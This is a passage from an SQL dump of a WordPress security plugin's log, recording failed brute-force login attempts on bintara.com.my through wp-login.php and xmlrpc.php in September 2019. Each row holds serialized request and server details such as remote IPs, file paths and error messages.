Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.244.150\";s:11:\"REMOTE_PORT\";s:5:\"50938\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAzJbIp53uPsY7BKArHqQAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568682789.98\";s:12:\"REQUEST_TIME\";s:10:\"1568682789\";}}','notice','2019-09-17 01:13:11','2019-09-17 01:13:10',17743016,19234376,'https://bintara.com.my/wp-login.php',1,0,'128.199.244.150'),(24329,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.244.150\";s:11:\"REMOTE_PORT\";s:5:\"51530\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAzKR@uZ4OC5N1Fn8Ez0QAAAIk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568682793.9425\";s:12:\"REQUEST_TIME\";s:10:\"1568682793\";}}','notice','2019-09-17 01:13:15','2019-09-17 01:13:14',18257648,19556952,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.244.150'),(24330,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.207.118\";s:11:\"REMOTE_PORT\";s:5:\"51384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA0vrIp53uPsY7BKArH6gAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568683198.7646\";s:12:\"REQUEST_TIME\";s:10:\"1568683198\";}}','notice','2019-09-17 01:20:00','2019-09-17 01:19:59',17738944,19229816,'https://bintara.com.my/wp-login.php',1,0,'5.135.207.118'),(24331,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.207.118\";s:11:\"REMOTE_PORT\";s:5:\"52400\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA0wWkPXSyJlCUJQmpIFQAAAYU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568683202.5711\";s:12:\"REQUEST_TIME\";s:10:\"1568683202\";}}','notice','2019-09-17 01:20:05','2019-09-17 01:20:03',18257760,19556128,'https://bintara.com.my/xmlrpc.php',1,0,'5.135.207.118'),(24332,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"56360\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA1XNVIJ66zPtjtaf3qTgAAAVg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568683356.445\";s:12:\"REQUEST_TIME\";s:10:\"1568683356\";}}','notice','2019-09-17 01:22:38','2019-09-17 01:22:37',17737840,19229240,'https://bintara.com.my/wp-login.php',1,0,'89.111.24.122'),(24333,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"89.111.24.122\";s:11:\"REMOTE_PORT\";s:5:\"56858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA1X2kPXSyJlCUJQmpIzgAAAY8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568683359.9357\";s:12:\"REQUEST_TIME\";s:10:\"1568683359\";}}','notice','2019-09-17 01:22:41','2019-09-17 01:22:40',18259744,19554648,'https://bintara.com.my/xmlrpc.php',1,0,'89.111.24.122'),(24334,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.132.107\";s:11:\"REMOTE_PORT\";s:5:\"48565\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA2hGkPXSyJlCUJQmpKUQAAAZU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568683652.7917\";s:12:\"REQUEST_TIME\";s:10:\"1568683652\";}}','notice','2019-09-17 01:27:34','2019-09-17 01:27:33',17741744,19233136,'https://bintara.com.my/wp-login.php',1,0,'37.187.132.107'),(24335,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.132.107\";s:11:\"REMOTE_PORT\";s:5:\"49309\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA2iB@uZ4OC5N1Fn8E0fgAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568683656.2739\";s:12:\"REQUEST_TIME\";s:10:\"1568683656\";}}','notice','2019-09-17 01:27:38','2019-09-17 01:27:36',18258312,19556568,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.132.107'),(24336,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"43776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA4Cg99C9j9bhK9KplBHAAAAQI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568684042.8708\";s:12:\"REQUEST_TIME\";s:10:\"1568684042\";}}','notice','2019-09-17 01:34:04','2019-09-17 01:34:03',17741240,19233712,'https://bintara.com.my/wp-login.php',1,0,'167.71.175.204'),(24337,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 